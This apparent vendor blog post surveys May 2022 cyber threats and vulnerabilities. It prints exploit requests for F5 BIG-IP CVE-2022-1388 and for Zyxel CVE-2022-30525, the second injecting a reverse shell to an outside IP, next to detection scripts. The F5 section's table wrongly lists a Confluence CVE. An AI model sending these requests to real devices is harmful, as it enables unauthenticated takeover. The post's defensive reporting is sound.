Emerging Cyber Threats of May 2022

Newly discovered critical vulnerabilities, emerging cyber threat groups, and high-impact malware attacks made May 2022 a busy month for cyber threat actors and security teams. Picus Labs swiftly added attack simulations to Picus Threat Library for these new threats as they were discovered. 

In this blog post, we curated a list of top cyber threats observed in May 2022. You can easily test your security controls against each threat with the Picus Complete Security Control Validation Platform.

Top Cyber Threats of May 2022

1. F5 BIG-IP iControl REST (CVE-2022-1388) Vulnerability
2. Follina - Microsoft Office CVE-2022-30190 Vulnerability
3. The Black Basta Ransomware Campaign
4. Zyxel Firewall Remote Code Injection (CVE-2022-30525) Vulnerability
5. Bitter APT Group
6. Exotic Lily APT Group - Bumblebee Malware
7. Twisted Panda APT group - Cyber Espionage Campaign


1. F5 BIG-IP iControl REST (CVE-2022-1388) Vulnerability

On May 4th, 2022, F5 Networks published an advisory on the CVE-2022-1388 remote code execution vulnerability [1]. The F5 BIG-IP product allows its users to run commands as administrator remotely using the "/mgmt/tm/util/bash" service. Adversaries can exploit this feature to execute malicious commands with elevated privileges because the "/mgmt/tm/util/bash" service does not require a password or authentication.

POST /mgmt/tm/util/bash HTTP/1.1
Host: <IP_of_target_f5_product>:8443
X-F5-Auth-Token: 0
Authorization: Basic YWRtaW46
Connection: X-F5-Auth-Token, X-Forwarded-Host
X-Forwarded-For: localhost
Content-Length: 0
{"command": "run" , "utilCmdArgs": " -c 'whoami' " }

Example Code 1: Post request example for F5 BIG-IP iControl REST (CVE-2022-1388) Vulnerability Exploitation
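
A detection sketch for the request shape in Example Code 1, added here as an example (not Picus or F5 code): it flags iControl REST requests whose Connection header lists the token and forwarding headers, as the request above does. The function name, header set, finding labels, and sample requests are assumptions made for illustration.

```python
# Added example: flag iControl REST requests shaped like Example Code 1.
# Header names come from the request above; the function name, header set,
# and sample requests are constructed for illustration.

# Headers that should not be declared hop-by-hop on a management request.
SENSITIVE_HOP_HEADERS = {"x-f5-auth-token", "x-forwarded-host", "x-forwarded-for"}


def check_icontrol_request(method, path, headers):
    """Return findings for one logged request (headers: name -> value)."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    path = path.lower().rstrip("/")
    findings = []
    if not path.startswith("/mgmt/"):
        return findings

    # Names listed in Connection are treated as hop-by-hop, so an
    # intermediary may drop them before the backend sees the request.
    listed = {t.strip().lower() for t in hdrs.get("connection", "").split(",")}
    abused = sorted(listed & SENSITIVE_HOP_HEADERS)
    if abused:
        findings.append("connection-lists-sensitive-headers:" + ",".join(abused))

    # The command-execution service named in the text above.
    if method.upper() == "POST" and path == "/mgmt/tm/util/bash":
        findings.append("command-endpoint-post")

    # Assumption: the log was taken at the network edge, so a client
    # claiming to be localhost is not a genuine local call.
    if hdrs.get("x-forwarded-for", "").strip().lower() in {"localhost", "127.0.0.1"}:
        findings.append("claimed-local-origin")
    return findings


# Constructed samples: the first mirrors Example Code 1, the second is an
# ordinary token-authenticated API call.
SUSPICIOUS = {"X-F5-Auth-Token": "0", "Authorization": "Basic YWRtaW46",
              "Connection": "X-F5-Auth-Token, X-Forwarded-Host",
              "X-Forwarded-For": "localhost"}
ORDINARY = {"X-F5-Auth-Token": "EXAMPLE-TOKEN", "Connection": "keep-alive"}

if __name__ == "__main__":
    print(check_icontrol_request("POST", "/mgmt/tm/util/bash", SUSPICIOUS))
    print(check_icontrol_request("GET", "/mgmt/tm/sys/version", ORDINARY))
```
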

Due to the widespread use of F5 BIG-IP, the vulnerability may lead to high-impact cyber-attacks if the vulnerable products are not patched. The CVSS score of the CVE-2022-1388 vulnerability is 9.8 Critical. Organizations should patch their products as soon as possible and update to versions 16.1.2.2, 15.1.5.1, 14.1.4.6, 13.1.5, or higher.

Picus Threat Library includes the following threat for CVE-2022-26134 vulnerability: 

| Threat ID | Threat Name |
|---|---|
| 58423 | Atlassian Confluence Web Attack Campaign |

For more detailed information, you can check our blog post on "Simulating and Preventing F5 BIG-IP CVE-2022-1388 RCE Exploits".

2. Follina - Microsoft Office CVE-2022-30190 Vulnerability

On May 27th, 2022, the nao_sec cyber security research team found a malicious Word document that retrieves a remote HTML file and executes commands in it using the Microsoft Support Diagnostic Tool (ms-msdt) [2]. In a benign operation, a Microsoft Office document should not be able to spawn the ms-msdt process. However, the CVE-2022-30190 vulnerability enables adversaries to craft a malicious Office document and run arbitrary commands using the ms-msdt process. The vulnerability was later named Follina, and it has a CVSS score of 7.8 High.

Microsoft released an advisory on how to disable Microsoft Office from using Microsoft Support Diagnostic Tool. Organizations are advised to apply the suggested workaround and reduce their attack surface.

Picus Threat Library includes the following threats for Follina - Microsoft Office CVE-2022-30190 Vulnerability:

| Threat ID | Threat Name |
|---|---|
| 71494 | Microsoft Support Diagnostics Tool (MSDT) Attack Campaign (CVE-2022-30190) |
| 23559 | MSDT Compatibility Troubleshooter Vulnerability Threat (Network Infiltration) |
| 43958 | MSDT Compatibility Troubleshooter Vulnerability Threat (Email Infiltration (Phishing)) |

Please check our blog post for more detailed information.

3. The Black Basta Ransomware Campaign

In late April 2022, a malicious actor named Black Basta posted an advertisement on underground forums for initial access to organizations based in the US, UK, Canada, Australia, and New Zealand [3]. Using stolen or illegally purchased credentials, the Black Basta ransomware group started infecting multiple organizations with ransomware. The tactics, techniques, and procedures (TTPs) used by Black Basta are similar to those of the recently disbanded Conti ransomware group. This similarity led security professionals to think that Black Basta might be a rebranded Conti group [4].


Figure 1: Victim's wallpaper after Black Basta ransomware infection

The Black Basta operators display recent ransomware trends in their attack campaigns.

  • Use of initial access brokers (IABs)
  • Data exfiltration for multiple extortion
  • Deleting or damaging built-in recovery systems

Although the ransomware itself requires administrative privileges, organizations should be aware of TTPs used by the Black Basta ransomware group.

Picus Threat Library includes the following threats for the Black Basta ransomware:

| Threat ID | Threat Name |
|---|---|
| 73218 | Black Basta Ransomware Download Threat |
| 53426 | Black Basta Ransomware Email Threat |

4. Zyxel Firewall Remote Code Injection (CVE-2022-30525) Vulnerability

Rapid7 reported an unauthenticated remote code injection vulnerability in Zyxel Firewalls on May 12th, 2022 [5]. The CVE-2022-30525 vulnerability has a CVSSv3 score of 9.8 Critical. The vulnerability affects the Zyxel products given in the table below.

| Affected Zyxel models | Affected firmware versions |
|---|---|
| ATP 100, 200, 500, 700, 800 | ZLD5.10 through ZLD5.21 Patch 1 |
| USG20-VPN, USG20W-VPN | ZLD5.10 through ZLD5.21 Patch 1 |
| USG FLEX 100, 100W, 200, 500, 700 | ZLD5.00 through ZLD5.21 Patch 1 |

Adversaries can abuse this vulnerability and execute commands as the "nobody" user via an administrative HTTP interface without authentication. According to Rapid7, there are more than 15000 products that are vulnerable to CVE-2022-30525, and patching the vulnerable products is advised.

POST /page486402/ztp/cgi-bin/handler HTTP/1.1
User-Agent: curl/7.79.1
Accept: */*
Content-Type: application/json
Content-Length: 168
Connection: close
{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged": "1","vlanid":"5","mtu":"; bash -c \"exec bash -i &>/dev/tcp/192.168.1.220/1270 <&1;\";","data":"hi"}

Example Code 2: Post request example for Zyxel Firewall Remote Code Injection (CVE-2022-30525) Vulnerability Exploitation
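
A field-level check for logged requests to the handler in Example Code 2, added here as an example (not Picus, Rapid7, or Zyxel code): it reports any field whose value is not in the expected format or contains shell metacharacters, which is where the injected command sits in the "mtu" value above. The function name, the expected-format table, and the sample bodies are assumptions made for illustration.

```python
# Added example: inspect a logged JSON body sent to the ZTP handler in
# Example Code 2. Field names come from that request; everything else
# (function name, expected formats, sample bodies) is constructed.
import json
import re

HANDLER_SUFFIX = "/ztp/cgi-bin/handler"
# Assumed value formats for the fields seen in the request above.
EXPECTED = {
    "mtu": re.compile(r"\d{1,5}"),
    "port": re.compile(r"\d{1,2}"),
    "vlanid": re.compile(r"\d{1,4}"),
    "vlan_tagged": re.compile(r"[01]"),
    "proto": re.compile(r"[a-z0-9]{1,16}"),
}
# Characters a shell would interpret if a value reached a command line.
SHELL_META = re.compile(r"[;&|`$<>\\\n]")


def inspect_ztp_body(path, body):
    """Return sorted findings for one request; an empty list means clean."""
    if not path.lower().endswith(HANDLER_SUFFIX):
        return []
    try:
        fields = json.loads(body)
    except ValueError:
        return ["unparseable-json"]
    if not isinstance(fields, dict):
        return ["unexpected-json-type"]

    findings = set()
    for name, value in fields.items():
        text = value if isinstance(value, str) else json.dumps(value)
        pattern = EXPECTED.get(name)
        if pattern is not None and not pattern.fullmatch(text):
            findings.add("bad-format:" + name)
        if SHELL_META.search(text):
            findings.add("shell-metachar:" + name)
    return sorted(findings)

# Constructed bodies: a plain settings change and one with a command
# separator appended to the mtu value.
CLEAN = ('{"command":"setWanPortSt","proto":"dhcp","port":"4",'
         '"vlan_tagged":"1","vlanid":"5","mtu":"1500","data":"hi"}')
TAMPERED = CLEAN.replace('"mtu":"1500"', '"mtu":"1500; echo constructed"')

if __name__ == "__main__":
    print(inspect_ztp_body("/ztp/cgi-bin/handler", CLEAN))
    print(inspect_ztp_body("/ztp/cgi-bin/handler", TAMPERED))
```
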

Picus Threat Library includes the following threat for CVE-2022-30525 vulnerability: 

| Threat ID | Threat Name |
|---|---|
| 84862 | Zyxel Web Attack Campaign |

5. Bitter APT Group

On May 11th, 2022, Cisco Talos Intelligence Group reported that a known South Asian cyber threat group called the Bitter APT group (T-APT-17) had started to attack Bangladesh's governmental organizations for the purpose of espionage [6]. This attack utilizes new variants of malware and shows that the threat group is targeting countries beyond its usual targets, which include China, Pakistan, and Saudi Arabia.

The Bitter APT group sends spearphishing emails to its targets for initial access. When a user opens the malicious attachment, the document connects to the threat group's C2 server and downloads additional malware named "ZxxZ" by exploiting Microsoft Office vulnerabilities such as CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802.

Picus Threat Library includes the following threats for the Bitter APT group:

| Threat ID | Threat Name |
|---|---|
| 62442 | Bitter Threat Group Campaign Malware Downloader Download Threat |
| 56532 | Bitter Threat Group Campaign Malware Downloader Email Threat |
| 63761 | Bitter RAT Email Threat |
| 47230 | Bitter RAT Download Threat |

6. Exotic Lily APT Group - Bumblebee Malware

Exotic Lily is an Initial Access Broker (IAB) affiliated with Russian cybercriminal groups such as FIN12, Wizard Spider, and Conti. On May 17th, 2022, Google Threat Analysis Group published a blog post on the Bumblebee malware campaign of the Exotic Lily APT group [7].

Threat actors set up fake personas and email addresses for their phishing campaign and distribute the Bumblebee malware using legitimate file-sharing services such as TransferNow, TransferXL, WeTransfer, and OneDrive. The Bumblebee malware is a backdoor that gives adversaries remote access to their victims' systems. In the past, the Exotic Lily APT group was known to use the BazarLoader malware, which seems to have been replaced by the Bumblebee malware.

Picus Threat Library includes the following threats for the Bumblebee malware:

| Threat ID | Threat Name |
|---|---|
| 50902 | Bumblebee Malware Download Threat |
| 90629 | Bumblebee Malware Email Threat |

7. Twisted Panda APT group - Cyber Espionage Campaign

The Twisted Panda APT group is a Chinese cyber espionage group that is capable of adapting and adjusting to world events and new technologies. Check Point Research uncovered a targeted cyber espionage campaign against Russian R&D facilities conducted by the Chinese APT group Twisted Panda on May 19th, 2022 [8]. The Russia-based R&D institutions have limited access to valuable resources due to sanctions. Adversaries send these institutions phishing emails with a malicious document masquerading as a "List of names under US sanctions". When an unsuspecting user opens the malicious document, the target system is infected with a backdoor called Spinner that is used to steal confidential information.

Picus Threat Library includes the following threats for the Twisted Panda APT group:

| Threat ID | Threat Name |
|---|---|
| 96806 | Twisted Panda Threat Group Campaign Malware Download Threat |
| 49294 | Twisted Panda Threat Group Campaign Malware Downloader Download Threat |
| 39229 | Twisted Panda Threat Group Campaign Malware Email Threat |
| 25909 | Twisted Panda Threat Group Campaign Malware Downloader Email Threat |

References

[1] https://support.f5.com/csp/article/K23605346

[2] https://twitter.com/nao_sec/status/1530196847679401984

[3] "Examining the Black Basta Ransomware's Infection Routine," Trend Micro, May 09, 2022. [Online]. Available: https://www.trendmicro.com/en_us/research/22/e/examining-the-black-basta-ransomwares-infection-routine.html

[4] L. Abrams, "New Black Basta ransomware springs into action with a dozen breaches," BleepingComputer, Apr. 27, 2022. [Online]. Available: https://www.bleepingcomputer.com/news/security/new-black-basta-ransomware-springs-into-action-with-a-dozen-breaches/

[5] J. Baines, "CVE-2022-30525 (FIXED): Zyxel Firewall Unauthenticated Remote Command Injection," Rapid7, May 12, 2022. [Online]. Available: https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/

[6] C. Raghuprasad, "Bitter APT adds Bangladesh to their targets." [Online]. Available: http://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html

[7] V. Stolyarov, "Exposing initial access broker with ties to Conti," Google, Mar. 17, 2022. [Online]. Available: https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/

[8] I. Cohen, "Twisted Panda: Chinese APT espionage operation against Russian's state-owned defense institutes," Check Point Research, May 19, 2022. [Online]. Available: https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/